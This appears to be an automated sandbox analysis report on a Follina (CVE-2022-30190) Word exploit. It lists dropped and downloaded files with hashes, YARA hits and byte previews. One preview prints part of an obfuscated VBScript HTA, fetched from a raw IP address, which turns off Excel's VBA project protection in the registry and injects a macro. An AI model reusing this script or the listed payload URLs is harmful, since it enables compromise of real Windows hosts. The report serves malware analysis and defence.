                                                                                                                                              Preview:<!doctype html>..<html lang="en">..<head>..<title>..Good thing we disabled macros..</title>..</head>..<body>..<p>..Lorem ipsum dolor sit amet, consectetur adipiscing elit. Quisque pellentesque egestas nulla in dignissim. Nam id mauris lorem. Nunc suscipit id magna id mollis. Pellentesque suscipit orci neque, at ornare sapien bibendum eu. Vestibulum malesuada nec sem quis finibus. Nam quis ligula et dui faucibus faucibus. In quis bibendum tortor.....Curabitur rutrum leo tortor, venenatis fermentum ex porttitor vitae. Proin eu imperdiet lorem, ac aliquet risus. Aenean eu sapien pharetra, imperdiet ipsum ut, semper diam. Nulla facilisi. Sed euismod tortor tortor, non eleifend nunc fermentum sit amet. Integer ligula ligula, congue at scelerisque sit amet, porttitor quis felis. Maecenas nec justo varius, semper turpis ut, gravida lorem. Proin arcu ligula, venenatis aliquam tristique ut, pretium quis velit.....Phasellus tristique orci enim, at accumsan velit interdum et. Aenean nec tristique
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 581x1278, frames 3
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):29235
                                                                                                                                              Entropy (8bit):7.203733489330109
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:384:+++r9RfjoOtgBku0d/8wAXLBw75uh62w+ccO+RJPBDJPKQELXu59ghnt8zgmM4CM:++ORjosugKi75u6+vJpDJCBOUK
                                                                                                                                              MD5:D7773EE5D4BDFEE97EB233BC5C35C0AA
                                                                                                                                              SHA1:51FFFFC7973C3F4EF6B0B153D66293C1CB8195E7
                                                                                                                                              SHA-256:F6D0AC498CDE70CFBE4F7DF6B86772BC5CFD43F835D09E0C9570D94801917332
                                                                                                                                              SHA-512:9A0843F34E331B103083A8698C97C76CF99EC05BF83266004DF9D55A7596C39F530E1CCF26B9095461A4552F9B146A746C3651A3135D0F6B647A324A122BF04E
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:......JFIF.............C...........................#.%$"."!&+7/&)4)!"0A149;>>>%.DIC<H7=>;...C...........;("(;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;........E.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..j(...(...(...(...(...(...(...(...(.....(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(.....i..yy... 9.*..%Z...m.....Y$....j..V.Z...Y....A..)........n.Q..I2..y.........v....j.r]B.....?.Ios..B{i.X.#dW..:...F}...vI.#2pkC.s...n.d.g.3".._...(......r;-J+F.X<FVs(.Tg8.[.j.I.N.d.~..+`.f.p*.
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 220x220, segment length 16, baseline, precision 8, 1268x951, frames 3
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):492596
                                                                                                                                              Entropy (8bit):7.89552218174887
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:12288:rA4G7o32/nTnZurIM8gdYjhNSduRYjeqw3C7Nv:Mx7o32/VeZJj5
                                                                                                                                              MD5:90BE6B795828441DF1C995671289E431
                                                                                                                                              SHA1:7368012CA949A57238DC158C0FEF24A2EFCEB359
                                                                                                                                              SHA-256:4A6A787D4BCE57A66828EB9F0F76A6FCAC265A97E6D091AFA150AAD19885C05B
                                                                                                                                              SHA-512:9DD8D38314E5C40E68DE3B0C0037EA7C0000F25125C37AC9DB95B5638FB4EEAEB35690F11CC51FD958645D84758698040B0A8CB2BA8A1BF60920B121068AD446
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:......JFIF.............C....................................................................C............................................................................"............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..O.j.6....2..Bp{....3..}.o..6..........o.....*+y....T.4.M.[...T.q$.^..../.....O....Zj2ya..%.D.....{.X...?u.,...o......P?$O...h..#....Z.....r...^!..... .O...Wx.4..g...c1?.......<:..6.k..}b..R.=>O.5.O.j.#.on.R.Ers..M'.....F..E._.....l....v..$g.|.{.?.+...T.-.@..D.v........}...."..ij.G...d.v6..Kn..3j....7p..@.......PG..^=...[...!..V........!....s..7w.?.?.....%..
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1824
                                                                                                                                              Entropy (8bit):2.1101189992498828
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:12:ijs/5M4yZlIbb28RPTtBAwJvbZE9Qf5l6exZEk7Af6BG8Xu2Wg6:2s/5HyZ+bbHNXAwJeUl6eckBBJ+2W
                                                                                                                                              MD5:6A8693888432DC8F8094B9F60C6E911B
                                                                                                                                              SHA1:04EAB175133D209F6CA37A049CD4E720BC0EE7EF
                                                                                                                                              SHA-256:7EB51844A86449D473C83126DDBA1B7231F8B7CA11C5EA56C369748F3C67A2A4
                                                                                                                                              SHA-512:7449497106AA59B2C536FAF3596943056D276EE2EEE2CE7DC70FA4CB211A0EA3B857EB205620A561E647D80373527DDCB04A7AA060E70E660E823222E130B7BF
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:..9hnc..P.UcIc0RKb:g . .1.8.2.7.0.1.7.9.5.0.1.../......./e.N.[~b0RvQ.TW[:N ..s*.z.../.....S.H.A.P.E. .X. .\.*. .M.E.R.G.E.F.O.R.M.A.T... . .............................................................................................................................................................................................................................................................................................................................................................................................0...4...6...8...T...H...J...................................................................................................................................................................................................................................................................................................................................................................................................................................................................gd*a
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1024
                                                                                                                                              Entropy (8bit):0.05390218305374581
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:3:ol3lYdn:4Wn
                                                                                                                                              MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                                                                                                                              SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                                                                                                                              SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                                                                                                                              SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                              Process:C:\Windows\SysWOW64\mshta.exe
                                                                                                                                              File Type:HTML document, ASCII text
                                                                                                                                              Category:downloaded
                                                                                                                                              Size (bytes):21824
                                                                                                                                              Entropy (8bit):4.502978783041859
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:192:fgVwLjUJpJf0t59KLKnVTpngGwK69kVaWXO:YVwLjmpJfC59KLKnVTpngGwK69kVaWXO
                                                                                                                                              MD5:3E55BD78BB922420E76EBAF2F5E13BCE
                                                                                                                                              SHA1:8E46A458697D4CF862C5B355E0DC4982363E3D15
                                                                                                                                              SHA-256:2BC598361C057879174A09C0833EF223225124D6745DF5615A7A1A9C6D273F4C
                                                                                                                                              SHA-512:D91869D5BF46C988915B39D5E6F7A34941333AF3B2C385E089B7662635895A6937D9CC0B3AABB8F76E8723A9034674A19B0E07F492E727950E21F0B698EB3632
                                                                                                                                              Malicious:false
                                                                                                                                              Yara Hits:
                                                                                                                                              • Rule: webshell_asp_obfuscated, Description: ASP webshell obfuscated, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\dllhost[1].hta, Author: Arnim Rupp
                                                                                                                                              IE Cache URL:http://159.75.135.162:61256/dllhost.hta
                                                                                                                                              Preview:<html><head><script language="vbscript">.Dim objExcel, WshShell, RegPath, action, objWorkbook, xlmodule..Set objExcel = CreateObject("Excel.Application").objExcel.Visible = False..Set WshShell = CreateObject("Wscript.Shell")..function RegExists(regKey)..on error resume next..WshShell.RegRead regKey..RegExists = (Err.number = 0).end function..' Get the old AccessVBOM value.RegPath = "HKEY_CURRENT_USER\Software\Microsoft\Office\" & objExcel.Version & "\Excel\Security\AccessVBOM"..if RegExists(RegPath) then..action = WshShell.RegRead(RegPath).else..action = "".end if..' Weaken the target.WshShell.RegWrite RegPath, 1, "REG_DWORD"..' Run the macro.Set objWorkbook = objExcel.Workbooks.Add().Set xlmodule = objWorkbook.VBProject.VBComponents.Add(1).xlmodule.CodeModule.AddFromString "Private "&"Type PRO"&"CESS_INF"&"ORMATION"&Chr(10)&" hPro"&"cess As "&"Long"&Chr(10)&" hThr"&"ead As L"&"ong"&Chr(10)&" dwPr"&"ocessId "&"As Long"&Chr(10)&" dwTh"&"readId A"&"s Long"&Chr(10)& _."End Typ
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                              File Type:HTML document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                              Category:downloaded
                                                                                                                                              Size (bytes):5737
                                                                                                                                              Entropy (8bit):4.627210073550201
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:t/iGBF2nPW5mDtWID8qImz1I8vHWYMLJS2lpyffnbTc7Oi/EAEwC8EA5KiSe+0gz:tJ5mDtWIDu0GTl9EHbTcKeZEwC8EaKiu
                                                                                                                                              MD5:4C00910BAF865F5D0D7F37F77816B375
                                                                                                                                              SHA1:ADA759E7A00B362553580A89269201257BD6F9E0
                                                                                                                                              SHA-256:32EC74CCEFC7D7FEB5C8817097652FC6014C6217F5B6A2695A95E680D6958153
                                                                                                                                              SHA-512:9C69E8FA9E1F27C6AB0E464A2E7CD1F89E5CACF671A775DC55045A19F3D5DAE98AF5EF3E973FA021DC7E933505AC8B706EA0F8DDB371BB7414E7A75CF933BE27
                                                                                                                                              Malicious:true
                                                                                                                                              Yara Hits:
                                                                                                                                              • Rule: EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22, Description: Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\exploit[1].htm, Author: Tobias Michalski, Christian Burkard
                                                                                                                                              • Rule: JoeSecurity_Follina, Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\exploit[1].htm, Author: Joe Security
                                                                                                                                              IE Cache URL:http://101.33.231.81:62563/exploit.html
                                                                                                                                              Preview:<!doctype html>..<html lang="en">..<head>..<title>..Good thing we disabled macros..</title>..</head>..<body>..<p>..Lorem ipsum dolor sit amet, consectetur adipiscing elit. Quisque pellentesque egestas nulla in dignissim. Nam id mauris lorem. Nunc suscipit id magna id mollis. Pellentesque suscipit orci neque, at ornare sapien bibendum eu. Vestibulum malesuada nec sem quis finibus. Nam quis ligula et dui faucibus faucibus. In quis bibendum tortor.....Curabitur rutrum leo tortor, venenatis fermentum ex porttitor vitae. Proin eu imperdiet lorem, ac aliquet risus. Aenean eu sapien pharetra, imperdiet ipsum ut, semper diam. Nulla facilisi. Sed euismod tortor tortor, non eleifend nunc fermentum sit amet. Integer ligula ligula, congue at scelerisque sit amet, porttitor quis felis. Maecenas nec justo varius, semper turpis ut, gravida lorem. Proin arcu ligula, venenatis aliquam tristique ut, pretium quis velit.....Phasellus tristique orci enim, at accumsan velit interdum et. Aenean nec tristique
                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                                                                                              File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x4ae, 9 symbols
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1364
                                                                                                                                              Entropy (8bit):4.120422056924814
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:H54C9A+gqyIiDKzhHaAhKqmxfII+ycuZhN+akSGPNnq9Wd:ZCffK96iKqmxg1ul+a36q9m
                                                                                                                                              MD5:CBC4FD42283484CF2D3661E516B43451
                                                                                                                                              SHA1:B2E7228A493A798BB45DDF1F44ACC49C5C0337CB
                                                                                                                                              SHA-256:12090443E2B39FCA7099B35FA2E4FB8AFA00B4FFAD3AF0D6B011407C4C51006E
                                                                                                                                              SHA-512:C02E05CE6AEE4FD0F61B69B93EFF18474037A3CB399989A4A5851234E273794BE2499C02CA063BC03B206B56700F2A32D1C72EB6481BC07ED027C279961F8A4C
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:L....b.............debug$S........p...................@..B.rsrc$01........X.......T...........@..@.rsrc$02........P...^...............@..@........T....c:\Users\user\AppData\Local\Temp\xppvbwul\CSC578DA5B3682742E2AA363EADA4BD665D.TMP.................!...U..... ............4.......C:\Users\user\AppData\Local\Temp\RES55EE.tmp.-.<...................'...Microsoft (R) CVTRES...=..cwd.C:\Windows\TEMP\SDIAG_4d4ccb62-1300-4c5f-92dc-0e3b25814c25.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe...............................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...x.p.p.v.b.w.u.l...d.l.l.....(.....L.e.g.a.l.C.o.p.
                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                                                                                              File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x4ae, 9 symbols
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1364
                                                                                                                                              Entropy (8bit):4.084699669422432
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:HyC9AWPbdOH0hhKqmxfWI+ycuZhNhakSvPNnq9Wd:wWPb8UvKqmx+1ulha3tq9m
                                                                                                                                              MD5:BB0053D5F736B89AFBB8F5F33B5E7218
                                                                                                                                              SHA1:BC0356C8CC0EE3D0F6575BCDA49C84B500A886BA
                                                                                                                                              SHA-256:0027B8C1EC66C5E0F3180DDAD2A9D7A7BE8E9EA7EFE0E4743336056392588744
                                                                                                                                              SHA-512:B392A188FC74745AB54711044818159103D21BDC63774D5A34F19F1C68FEAB6F368DA3F298D7BCDACA8B211ABB50C59001CE331341BB2C15179BF553E49A4DF9
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:L.....b.............debug$S........p...................@..B.rsrc$01........X.......T...........@..@.rsrc$02........P...^...............@..@........S....c:\Users\user\AppData\Local\Temp\hfyslwgs\CSCD4B89031A8FB43F8B14D4D9332D5938.TMP.................K..U5Sh..r..P...........3.......C:\Users\user\AppData\Local\Temp\RES5BB.tmp.-.<...................'...Microsoft (R) CVTRES...=..cwd.C:\Windows\TEMP\SDIAG_4d4ccb62-1300-4c5f-92dc-0e3b25814c25.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...h.f.y.s.l.w.g.s...d.l.l.....(.....L.e.g.a.l.C.o.p.
                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                                                                                              File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x4ae, 9 symbols
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1364
                                                                                                                                              Entropy (8bit):4.08674734556556
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:H/C9AWP2q/quhHahKqmxfII+ycuZhNtakS7PNnq9Wd:PWPlQKqmxg1ulta3xq9m
                                                                                                                                              MD5:E5AB62FAA5D8C8A3F961D1CFF28FCF95
                                                                                                                                              SHA1:E9E46C7366678D5C85E4C2876799BA5CB846A997
                                                                                                                                              SHA-256:9DBE47EB4DA49C11B8BDF462D9FEFAD81A22164B6FD110800217598AD5F9A9F0
                                                                                                                                              SHA-512:2D6941FE9DE5E2C4E7D22136A0F5C17FAB3BC8B3930C0F7D37145B6026C9BE6F985F952AA475AB20D576CB788537EA9F63FA954B751F5E4F987C2C03E282B629
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:L......b.............debug$S........p...................@..B.rsrc$01........X.......T...........@..@.rsrc$02........P...^...............@..@........S....c:\Users\user\AppData\Local\Temp\s0ida0bj\CSCC025FCB9965F4BC3896D6CAE016378F.TMP.......................5z.u^..[...........4.......C:\Users\user\AppData\Local\Temp\RES5C8A.tmp.-.<...................'...Microsoft (R) CVTRES...=..cwd.C:\Windows\TEMP\SDIAG_4d4ccb62-1300-4c5f-92dc-0e3b25814c25.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe...............................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...s.0.i.d.a.0.b.j...d.l.l.....(.....L.e.g.a.l.C.o.p.
                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                              File Type:MSVC .res
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):652
                                                                                                                                              Entropy (8bit):3.090964277542768
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryzak7YnqqvPN5Dlq5J:+RI+ycuZhNhakSvPNnqX
                                                                                                                                              MD5:DA4BFE7F55355368C79EE672A4185098
                                                                                                                                              SHA1:5B75DE9971EC4A6E63E519B9D5044EAC3BA7FB47
                                                                                                                                              SHA-256:F9BB363D2704FDF15A83424F1EF06EE22853A2755B8702E36972D67BBB4AD7C4
                                                                                                                                              SHA-512:B0997552C916A28AE3AE25332D50EBA9A342AA0C6E7F765694515EE6B7BA59C3A5C3C9FCB479800BB897428F9D224EAE4AD575F4AA0879B8CBAAF11C4161C317
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...h.f.y.s.l.w.g.s...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...h.f.y.s.l.w.g.s...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):3584
                                                                                                                                              Entropy (8bit):3.0912843516559185
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:etGSr9pz1qlkCe745Q7GslPor9LjvX5ekjV4gztkZfDdy6Iv+/OBWI+ycuZhNhaU:6vpqb927GslPELDRjyJDdQk1ulha3tq
                                                                                                                                              MD5:B651714635F6DA8C2823B9E0E06BEB86
                                                                                                                                              SHA1:1172AE739291891D8B11CED2EECF16EC2A37F006
                                                                                                                                              SHA-256:E80B4D2EB20B23D5E09B9E05B893E8066B104276DCCA506B132CD684E771DAFA
                                                                                                                                              SHA-512:083503C70CBAC9CB0B2E627D89F8B1265E14B551FBEE30A91D03DD1330640289BF831031EFDA5C1C40FB4FFD01913844859C9731E1FEF3B7B16669875B42CA12
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....b...........!.................%... ...@....... ....................................@..................................$..K....@.......................`....................................................... ............... ..H............text...4.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................%......H........ ..4............................................................0..6....... ....s........o....(....,..o....r...pr...po....*~....*F.r...pr...po....*..(....*BSJB............v4.0.30319......l.......#~..........#Strings............#US.........#GUID.......t...#Blob...........W=........%3............................................................................2.+...N.B.....................0.....W.......+.............................Q.9.......... \.....P ......j...... ..
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                              File Type:GIF image data, version 89a, 15 x 15
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):663
                                                                                                                                              Entropy (8bit):5.949125862393289
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:12:PlrojAxh4bxdtT/CS3wkxWHMGBJg8E8gKVYQezuYEecp:trPsTTaWKbBCgVqSF
                                                                                                                                              MD5:ED3C1C40B68BA4F40DB15529D5443DEC
                                                                                                                                              SHA1:831AF99BB64A04617E0A42EA898756F9E0E0BCCA
                                                                                                                                              SHA-256:039FE79B74E6D3D561E32D4AF570E6CA70DB6BB3718395BE2BF278B9E601279A
                                                                                                                                              SHA-512:C7B765B9AFBB9810B6674DBC5C5064ED96A2682E78D5DFFAB384D81EDBC77D01E0004F230D4207F2B7D89CEE9008D79D5FBADC5CB486DA4BC43293B7AA878041
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:GIF89a....w..!..MSOFFICE9.0.....sRGB......!..MSOFFICE9.0.....msOPMSOFFICE9.0Dn&P3.!..MSOFFICE9.0.....cmPPJCmp0712.........!.......,....................'..;..b...RQ.xx..................,+................................yy..;..b.........................qp.bb..........uv.ZZ.LL.......xw.jj.NN.A@....zz.mm.^_.........yw........yx.xw.RR.,*.++............................................................................................................................................................................................................8....>.......................4567...=..../0123.....<9:.()*+,-.B.@...."#$%&'....... !............C.?....A;<...HT(..;
                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                              File Type:MSVC .res
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):652
                                                                                                                                              Entropy (8bit):3.072448993772642
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryPak7Ynqq7PN5Dlq5J:+RI+ycuZhNtakS7PNnqX
                                                                                                                                              MD5:05F21B01AE097F357A8B755EF3C55BD3
                                                                                                                                              SHA1:8DE3B4DBB8508E997809C3740B9F0D4D05A88792
                                                                                                                                              SHA-256:E0C632327D8C7511B6DEBA08CCF9CB9EE397D649DFA38F4F3750811E7DE636FC
                                                                                                                                              SHA-512:DE93D06BF8C8F4C9BA5AA02939936FB7A121E9E18D02073FE31562FFF7836E8494F08FC266A987DC65342144E4D3087AE946EEA8A73B3BF95358EA375458157A
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...s.0.i.d.a.0.b.j...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...s.0.i.d.a.0.b.j...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):5120
                                                                                                                                              Entropy (8bit):3.7831670724119446
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:48:6EoPhmKraYZkH8KTibUyxkwjj0JEC+CFSlwYejc1ulta3xq:SDaAkHHoPk8vCueL/K
                                                                                                                                              MD5:27B371F8AB9050AA9BFB2DD74009B90D
                                                                                                                                              SHA1:73A25B90E1707E89B1E67596F52AB5DA33EA5001
                                                                                                                                              SHA-256:D967F8235C80D4E94371E063E38C332CB92F34911943729C630A0CF9C1694185
                                                                                                                                              SHA-512:C20C1DBBCEB01DDC0993C2914567F202906A7548596E7EAB1431F49EA6F58AE7FD0DE6F54E9476DE46D1E97F57B8B33B61C8E350C4F5703C3B35962416C2426E
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......b...........!................>*... ...@....... ....................................@..................................)..S....@.......................`....................................................... ............... ..H............text...D.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................ *......H....... ".............................................................."..(....*J.#(....r...p(....*..(....*2~.....(....*....0.......... ....s..... ....s...............r;..p.........(......s.............5.....".....5.....3+E...../...(.-...2.3+1...:3...+)....3...+....+...+...+...+...,...+...+......r;..p...o................ ...o.........+Y.......r=..p..o......1.r=..p..o..........+(r...p..o...........(........r...p(.........X.......i2..........(.........o........o....-.r...p....
                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                              File Type:MSVC .res
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):652
                                                                                                                                              Entropy (8bit):3.1130536385099563
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryAak7YnqqGPN5Dlq5J:+RI+ycuZhN+akSGPNnqX
                                                                                                                                              MD5:C7C021E4A2191A5585CE10C0E22011E6
                                                                                                                                              SHA1:C4C7FDE82C2981297F5FA3640D4E6156ED945D03
                                                                                                                                              SHA-256:B8E2AA6CDD97A5889221145A7F9EC30542969CB82D63E1FF2BD54FD6C41E791B
                                                                                                                                              SHA-512:8721D8DA68266E6A9CC16C2FDF307CB3ABDABBDF6A0FAA7C60476B0330B2B445E0299DF8641E78D85F0CB5E1EC53706EA02DDAEF2931F304F0742F8B6731CA1D
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...x.p.p.v.b.w.u.l...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...x.p.p.v.b.w.u.l...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):9728
                                                                                                                                              Entropy (8bit):4.795053279708517
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:GZKqedmYoNKvUTCSH3gR8H8FgwSHwBtkwZYPaSJ365O0ieMjQZamRnIjQK:ZElNK8TCSfHyPtkwZ+vKOjQZnnQ
                                                                                                                                              MD5:96675940BC8FEA4904357D87F05E25B6
